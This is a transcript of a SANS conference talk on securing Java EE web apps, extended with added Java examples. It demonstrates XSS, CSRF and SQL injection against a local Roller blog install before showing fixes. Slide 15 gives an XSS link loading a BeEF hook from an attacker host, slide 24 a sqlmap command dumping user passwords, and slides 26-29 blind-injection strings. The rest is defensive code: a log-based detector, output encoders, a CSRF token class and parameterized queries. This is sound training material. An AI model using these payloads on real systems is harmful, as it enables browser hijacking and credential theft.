Securing Java EE Web Apps

Published in: Technology
  • SANS has a number of free resources that you can access to learn about application and software security. The SANS Software Security web site has free white papers, webcasts, and other information, as well as the associated AppSec Street Fighter blog. You can also follow us on Twitter for the latest news, information, and discounts on upcoming events. SANS has various courses on web application security, secure coding, and penetration testing where you can learn the skills required to create more secure applications. These courses include the following:
    • DEV522: Web Application Security Essentials is a six-day course where you learn how to create secure web applications that are resistant to attack.
    • DEV541: Secure Coding in Java/JEE is a four-day course that covers secure coding techniques that you can use to build more secure Java/JEE applications.
    • DEV530: Essential Secure Coding in Java/JEE is a two-day course that covers the most essential topics for creating Java web apps. This course is ideal for students who cannot be away from the office for extended periods of time.
    • DEV544: Secure Coding in .NET is a four-day course that covers secure coding techniques that you can use to build more secure .NET applications.
    • DEV532: Essential Secure Coding in ASP.NET is a two-day course that covers the most essential topics for creating ASP.NET apps. This course is ideal for students who cannot be away from the office for extended periods of time.
    • DEV542: Web App Pentesting & Ethical Hacking is a six-day course where you learn how to hack web applications.
Transcript of "Securing Java EE Web Apps"

    1. Securing Java EE Web Apps
      • Frank Kim
      • Principal, ThinkSec
      • Author, SANS Institute
    2. About
      • Frank Kim
        • Consultant, ThinkSec
        • Author, SANS Secure Coding in Java/JEE
        • SANS Application Security Curriculum Lead
    3. What You Should Know
      • Hacking is not hard
      • Don't trust any data
        • Assume that your users are evil!
    4. Outline
      • Web App Attack Refresher
        • XSS, CSRF, SQL Injection
      • Testing
        • Hacking an open source app
      • Secure Coding
        • Fixing security bugs
    5. Cross-Site Scripting (XSS)
      • Occurs when unvalidated data is displayed back to the browser
      • Types of XSS
        • Stored
        • Reflected
        • Document Object Model (DOM) based
    6. Cross-Site Request Forgery (CSRF)
    7. SQL Injection (SQLi)
      • Occurs when dynamic SQL queries are used
        • By injecting arbitrary SQL commands, attackers can extend the meaning of the original query
        • Can potentially execute any SQL statement on the database
      • Very powerful
        • #1 on CWE/SANS Top 25 Most Dangerous Software Errors
        • #1 on OWASP Top 10
    8. Outline (repeat of slide 4)
    9. What are We Testing?
      • Installation of Roller 3.0
      • Fake install of SANS AppSec Street Fighter Blog
      • Want to simulate the actions that a real attacker might take
        • There are definitely other avenues of attack
        • We're walking through one attack scenario
    10. Attack Scenario
      • XSS to control the victim's browser
      • Combine XSS and CSRF to conduct a privilege escalation attack
        • Use escalated privileges to access another feature
      • Use SQL Injection to access the database directly
    11. Spot the Vuln - XSS
    12. XSS in head.jsp
    13. Testing the "look" Param
      • Admin pages include head.jsp
      • The param is persistent for the session
    14. XSS Exploitation
      • Introducing BeEF
        • Browser Exploitation Framework
        • http://www.bindshell.net/tools/beef
      • Uses XSS to hook the victim's browser
        • Log user keystrokes, view browsing history, execute JavaScript, etc.
        • Advanced attacks: Metasploit integration, browser exploits, etc.
    15. XSS Exploitation Overview (diagram: Victim and Attacker)
      1) Attacker sends a link with the evil BeEF script:
         http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
      2) Victim clicks the evil link
      3) Victim's browser sends data to the attacker
    16. BeEF XSS Demo
    17. Spot the Vuln - CSRF
    18. CSRF in UserAdmin.jsp (want to use CSRF to change this field)
    19. CSRF Demo
    20. Spot the Vuln - SQL Injection
    21. SQL Injection in UserServlet
    22. SQL Injection Testing
      • UserServlet is vulnerable to SQLi
        • http://localhost:8080/roller/roller-ui/authoring/user
      (screen text: No results)
    23. Exploiting SQL Injection
      • Introducing sqlmap
        • http://sqlmap.sourceforge.net
      • Tool that automates detection and exploitation of SQL Injection vulns
        • Supports MySQL, Oracle, PostgreSQL, MS SQL Server
        • Supports blind, inband, and batch queries
        • Fingerprint/enumeration: dump db schemas, tables/column names, data, db users, etc.
        • Takeover features: read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc.
    24. sqlmap Syntax
      • Dump userids and passwords:
          python sqlmap.py \
            -u "http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25" \
            --cookie "username=test; JSESSIONID=<INSERT HERE>" \
            --drop-set-cookie -p startsWith \
            --dump -T rolleruser -C username,passphrase -v 2
    25. SQL Injection Demo
    26. How it Works
      • The injected startsWith values, one per request:
          f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
          f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
          f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy
    27. Step By Step [0]
          SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;
      • returns ilovethetajmahal
    28. Step By Step [1]
          SELECT MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);
      • returns i
          SELECT MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);
      • returns l
          SELECT MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);
      • returns o
    29. Step By Step [2]
          SELECT ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));
      • returns 105
          SELECT ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));
      • returns 108
          SELECT ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));
      • returns 111
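Slides 26 to 29 show why this extraction is noisy from the server's side: every character guess is its own HTTP request, and consecutive requests differ only in the number after the comparison operator. The following Java class is an added example written for this page (it is not from the deck, from Roller, or from sqlmap) that turns that observation into a log-based detection: it URL-decodes the query string of each access-log line, looks for the ORD(MID( shape and the trailing AND 'x' LIKE 'x tautology seen on slide 26, and counts probes per client. The log lines are constructed for the example in Common Log Format; the class name, the method names and the flagging threshold are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example, not from the deck: server-side detection of the boolean-based
// blind extraction shown on slides 26-29. Every guess is a separate request whose
// injected condition differs only in the compared number, so the access log shows
// a burst of near-identical requests from one client.
public final class BlindSqliDetector {

    // Common Log Format: client, identity, user, [time], "METHOD path HTTP/x", status
    private static final Pattern LOG = Pattern.compile(
            "^(\\S+) \\S+ \\S+ \\[[^\\]]+\\] \"(?:GET|POST) (\\S+) HTTP/[\\d.]+\" (\\d{3})");

    // Probe shape from the slides: ORD(MID((SELECT ...), n, 1)) > k, followed by the
    // tautology sqlmap appends to re-balance the original quote: AND 'x' LIKE 'x
    private static final Pattern PROBE = Pattern.compile(
            "(?i)\\bORD\\s*\\(\\s*MID\\s*\\(|\\bAND\\s+'([A-Za-z0-9]+)'\\s+LIKE\\s+'\\1\\b");

    // True when the URL-decoded query string carries the probe signature.
    static boolean isProbe(String rawQueryString) {
        String decoded;
        try {
            decoded = URLDecoder.decode(rawQueryString, StandardCharsets.UTF_8); // Java 10+
        } catch (IllegalArgumentException malformed) {
            decoded = rawQueryString; // malformed %-escapes: inspect the raw text instead
        }
        return PROBE.matcher(decoded).find();
    }

    // Number of probe requests per client address over the given log lines.
    static Map<String, Integer> probeCountsByClient(String[] lines) {
        Map<String, Integer> counts = new TreeMap<>();
        for (String line : lines) {
            Matcher m = LOG.matcher(line);
            if (!m.find()) continue;
            String client = m.group(1);
            String path = m.group(2);
            int q = path.indexOf('?');
            counts.putIfAbsent(client, 0);
            if (q >= 0 && isProbe(path.substring(q + 1))) {
                counts.merge(client, 1, Integer::sum);
            }
        }
        return counts;
    }

    // Clients whose probe count reaches the threshold. Dumping one column value
    // blind takes dozens of guesses, so a low threshold is enough; the value used
    // by the caller is an assumption for this example.
    static List<String> flaggedClients(Map<String, Integer> counts, int threshold) {
        List<String> flagged = new ArrayList<>();
        for (Map.Entry<String, Integer> e : counts.entrySet()) {
            if (e.getValue() >= threshold) flagged.add(e.getKey());
        }
        return flagged;
    }

    // Constructed log lines: one normal lookup, the three guesses from slide 26
    // (URL-encoded, as a servlet container would log them), then another lookup.
    static final String PROBE_PREFIX = "f%25%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28passphrase%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%20FROM%20roller.rolleruser%20LIMIT%202%2C%201%29%2C%201%2C%201%29%29%20%3E%20";
    static final String PROBE_SUFFIX = "%20AND%20%27neEy%27%20LIKE%20%27neEy";
    static final String[] SAMPLE_LOG = {
        "10.0.0.5 - - [10/Feb/2012:10:01:01 +0000] \"GET /roller/roller-ui/authoring/user?startsWith=f HTTP/1.1\" 200 512",
        "10.0.0.9 - - [10/Feb/2012:10:01:02 +0000] \"GET /roller/roller-ui/authoring/user?startsWith=" + PROBE_PREFIX + "103" + PROBE_SUFFIX + " HTTP/1.1\" 200 2048",
        "10.0.0.9 - - [10/Feb/2012:10:01:03 +0000] \"GET /roller/roller-ui/authoring/user?startsWith=" + PROBE_PREFIX + "104" + PROBE_SUFFIX + " HTTP/1.1\" 200 2048",
        "10.0.0.9 - - [10/Feb/2012:10:01:04 +0000] \"GET /roller/roller-ui/authoring/user?startsWith=" + PROBE_PREFIX + "105" + PROBE_SUFFIX + " HTTP/1.1\" 200 37",
        "10.0.0.5 - - [10/Feb/2012:10:01:05 +0000] \"GET /roller/roller-ui/authoring/user?startsWith=fr HTTP/1.1\" 200 498",
    };

    public static void main(String[] args) {
        Map<String, Integer> counts = probeCountsByClient(SAMPLE_LOG);
        counts.forEach((client, n) -> System.out.println(client + ": " + n + " blind-SQLi probe(s)"));
        System.out.println("flagged: " + flaggedClients(counts, 3));
    }
}
```

Run as-is, the sample gives 10.0.0.9 three probes and 10.0.0.5 none, so only 10.0.0.9 is flagged. The response-size column is also worth watching in a real log: a true comparison returns the matching rows and a false one returns the "No results" page from slide 22, which is exactly the difference the blind technique depends on.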
    30. Attack Summary
      • XSS to control the victim's browser
      • Combine XSS and CSRF to conduct a privilege escalation attack
        • Use escalated privileges to access another feature
      • Use SQL Injection to access the database directly
    31. Outline (repeat of slide 4)
    32. Data Validation (diagram)
      • Inbound data: validate before the application consumes it ("Should I be consuming this?")
      • Outbound data: encode before the application emits it ("Should I be emitting this?")
      • The same validation and encoding steps sit between the application and its data store
    33. Output Encoding
      • Encoding
        • Convert characters so they are treated as data and not special characters
      • Must escape differently depending on where data is displayed on the page
      • XSS Prevention Cheat Sheet
        • http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
    34. Fix XSS in head.jsp
      • Add URL encoding:
          <link rel="stylesheet" type="text/css" media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />
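Slides 33 and 34 make the point that the encoder must match the context: in head.jsp the theme name lands in a URL path segment inside a quoted href attribute, so URL encoding is the right choice there, while the same value echoed into element text would need HTML entity encoding instead. The class below is an added example written for this page, not Roller code and not the ESAPI encoder the slide calls; it implements minimal encoders for the three contexts, builds the stylesheet link from slide 34 with the theme name encoded, and shows what the payload shape from slide 15 becomes in each context. Class and method names are assumptions, and a production application should use a vetted library such as ESAPI or the OWASP Java Encoder rather than hand-rolled encoders.

```java
import java.nio.charset.StandardCharsets;

// Added example (not Roller or ESAPI code): minimal contextual output encoders
// for the contexts discussed on the Output Encoding slide.
public final class ContextualEncoder {

    // Text placed inside an HTML element body: make markup characters inert.
    public static String forHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Value inside a double-quoted HTML attribute: the same entities apply; the
    // quote is the character that lets untrusted data close the attribute.
    public static String forHtmlAttribute(String s) {
        return forHtml(s);
    }

    // One path segment of a URL (the head.jsp case: a theme directory name).
    // Percent-encode everything except RFC 3986 unreserved characters, so the
    // value can neither terminate the href attribute nor add path segments.
    public static String forUrlPathSegment(String s) {
        StringBuilder sb = new StringBuilder();
        for (byte b : s.getBytes(StandardCharsets.UTF_8)) {
            int c = b & 0xff;
            boolean unreserved = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9') || c == '-' || c == '_' || c == '.' || c == '~';
            if (unreserved) sb.append((char) c);
            else sb.append('%').append(String.format("%02X", c));
        }
        return sb.toString();
    }

    // The stylesheet link from slide 34, with the theme name encoded for the
    // context it lands in: a path segment inside a quoted href.
    public static String stylesheetLink(String contextPath, String theme) {
        return "<link rel=\"stylesheet\" type=\"text/css\" media=\"all\" href=\""
                + contextPath + "/roller-ui/theme/" + forUrlPathSegment(theme)
                + "/colors.css\" />";
    }

    public static void main(String[] args) {
        // Constructed input with the shape of the "look" payload on slide 15.
        String look = "\"><script src=\"http://evil.example/hook.js\"></script>";
        System.out.println(stylesheetLink("/roller", look));   // quote and slashes become %22, %2F
        System.out.println(forHtml(look));                     // angle brackets become entities
        System.out.println(forUrlPathSegment("basic"));        // a real theme name is unchanged
    }
}
```

The three outputs show that one encoder cannot serve every context: the path-segment encoder leaves angle brackets percent-encoded, which is correct inside an href but would be wrong for element text, and the HTML encoder leaves slashes alone, which is correct in text but would let a theme name traverse directories in a URL.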
    35. Fix CSRF
      • UserAdmin.jsp: add anti-CSRF token
          <input type="hidden" name="<%= CSRFTokenUtil.SESSION_ATTR_KEY %>" value="<%= CSRFTokenUtil.getToken(request.getSession(false)) %>">
      • UserAdminAction.java: check anti-CSRF token
          if (!CSRFTokenUtil.isValid(req.getSession(false), req)) {
              return mapping.findForward("error");
          }
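The slide shows where the token is emitted and where it is checked but not what CSRFTokenUtil does. The class below is an added example written for this page, not Roller's CSRFTokenUtil, showing one way to implement a per-session authenticity token: a 256-bit value from SecureRandom stored as a session attribute, and a validation that fails closed when the session or token is missing and compares in constant time. The session is modelled as an attribute map standing in for HttpSession.getAttribute/setAttribute, and the class, method and attribute names are assumptions for the example.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

// Added example, not Roller's CSRFTokenUtil: a per-session anti-CSRF token like
// the one the Fix CSRF slide adds to UserAdmin.jsp and checks in UserAdminAction.
// Map<String, Object> stands in for HttpSession attributes (assumption).
public final class CsrfTokenUtil {
    public static final String SESSION_ATTR_KEY = "csrf_token"; // hypothetical attribute name
    private static final SecureRandom RNG = new SecureRandom();

    // Returns the session's token, creating a fresh 256-bit random one on first use.
    public static String getToken(Map<String, Object> session) {
        Object existing = session.get(SESSION_ATTR_KEY);
        if (existing instanceof String) return (String) existing;
        byte[] raw = new byte[32];
        RNG.nextBytes(raw);
        String token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        session.put(SESSION_ATTR_KEY, token);
        return token;
    }

    // Validates the token submitted with a state-changing request. No session,
    // no token, or a mismatch all fail closed; MessageDigest.isEqual compares in
    // constant time so the check does not leak the token byte by byte.
    public static boolean isValid(Map<String, Object> session, String submitted) {
        if (session == null || submitted == null) return false;
        Object expected = session.get(SESSION_ATTR_KEY);
        if (!(expected instanceof String)) return false;
        byte[] a = ((String) expected).getBytes(StandardCharsets.UTF_8);
        byte[] b = submitted.getBytes(StandardCharsets.UTF_8);
        return MessageDigest.isEqual(a, b);
    }

    // The hidden field from the slide. Both attribute values are quoted; the token
    // is base64url, so it contains no characters that need attribute encoding.
    public static String hiddenField(Map<String, Object> session) {
        return "<input type=\"hidden\" name=\"" + SESSION_ATTR_KEY
                + "\" value=\"" + getToken(session) + "\">";
    }

    public static void main(String[] args) {
        Map<String, Object> session = new HashMap<>();   // constructed session
        String token = getToken(session);
        System.out.println(hiddenField(session));
        System.out.println("same session, real token:  " + isValid(session, token));            // true
        System.out.println("forged request, no token:  " + isValid(session, null));             // false
        System.out.println("forged request, guessed:   " + isValid(session, "AAAA"));           // false
        System.out.println("token from another session: " + isValid(new HashMap<>(), token));   // false
    }
}
```

A forged cross-site request can include the victim's session cookie (the browser adds it automatically) but cannot read the token out of the victim's page, so the last three cases fail. In a servlet action the submitted value comes from a request parameter named SESSION_ATTR_KEY, which is why the slide's isValid takes the request as its second argument.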
    36. Fix SQL Injection
      • Use parameterized queries correctly:
          if (startsWith == null || startsWith.equals("")) {
              query = "SELECT username, emailaddress FROM rolleruser";
              stmt = con.prepareStatement(query);
          } else {
              query = "SELECT username, emailaddress FROM rolleruser "
                    + "WHERE username LIKE ? OR emailaddress LIKE ?";
              stmt = con.prepareStatement(query);
              stmt.setString(1, startsWith + "%");
              stmt.setString(2, startsWith + "%");
          }
          rs = stmt.executeQuery();
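The slide's fix binds startsWith as a parameter, which is what stops the injection: the value can no longer change the structure of the query. One caveat a practitioner will want on top of that: a bound parameter does not stop LIKE wildcards, so a user-supplied "%" or "_" (the sqlmap URL on slide 24 sends f%25, i.e. "f%") still matches every row. The class below is an added example written for this page, not Roller's UserServlet; it keeps the slide's prepared statement, escapes the LIKE metacharacters in the user's value and declares an ESCAPE character so the value is matched literally. The class and method names are assumptions, and main runs without a database because it only shows what would be bound.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

// Added example, not Roller's UserServlet: the parameterized lookup from the Fix
// SQL Injection slide plus literal matching of the user's value in LIKE.
public final class UserLookup {

    // Escapes the LIKE metacharacters and the escape character itself, so the
    // value matches literally. '!' is used as the escape character because a
    // backslash inside a MySQL string literal is itself an escape.
    static String escapeLikeWildcards(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            if (c == '!' || c == '%' || c == '_') sb.append('!');
            sb.append(c);
        }
        return sb.toString();
    }

    // Builds the prepared statement. The user value never becomes part of the SQL
    // text; it is only ever a bound parameter, exactly as on the slide.
    static PreparedStatement prepare(Connection con, String startsWith) throws SQLException {
        if (startsWith == null || startsWith.isEmpty()) {
            return con.prepareStatement("SELECT username, emailaddress FROM rolleruser");
        }
        PreparedStatement stmt = con.prepareStatement(
                "SELECT username, emailaddress FROM rolleruser"
              + " WHERE username LIKE ? ESCAPE '!' OR emailaddress LIKE ? ESCAPE '!'");
        String pattern = escapeLikeWildcards(startsWith) + "%";  // prefix match, as on the slide
        stmt.setString(1, pattern);
        stmt.setString(2, pattern);
        return stmt;
    }

    // Runs the lookup and returns "username <emailaddress>" per row.
    static List<String> findUsers(Connection con, String startsWith) throws SQLException {
        List<String> out = new ArrayList<>();
        try (PreparedStatement stmt = prepare(con, startsWith);
             ResultSet rs = stmt.executeQuery()) {
            while (rs.next()) {
                out.add(rs.getString("username") + " <" + rs.getString("emailaddress") + ">");
            }
        }
        return out;
    }

    public static void main(String[] args) {
        // Constructed inputs; no database is needed to see what gets bound.
        for (String in : new String[] {"f", "f%", "_", "f' OR '1'='1"}) {
            System.out.printf("%-14s -> bound pattern: %s%n", in, escapeLikeWildcards(in) + "%");
        }
    }
}
```

The last input shows the other half of the point: the quote and the OR are bound as plain characters and compared against usernames, never parsed as SQL. The "%" input shows the wildcard caveat: without escaping it would be bound as "%%" and match the whole table, which is harmless for a directory listing but not for any query whose result set is sensitive.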
    37. Building Secure Software (diagram; source: Microsoft SDL)
    38. Remember
      • Hacking is not hard
      • Don't trust any data
        • Validate input
          • Prefer whitelists
          • Use authenticity token
        • Encode output
          • Contextual encoding
          • Use parameterized queries
    39. SANS Software Security
      • SANS AppSec 2012
        • April 30 - May 1 in Las Vegas
        • CFP is open now!
        • http://sans.org/appsec-2012
      • New courses
        • DEV551 Secure iOS Development
        • DEV568 Secure Android Development
      • Free resources
        • Top 25, blog, white papers, webcasts, and more at http://software-security.sans.org
      • Discount
        • Save 10% using the discount code DEVOXX. Enterprise pricing avail.
    40. Thanks!
      • Frank Kim
      • [email_address]  @sansappsec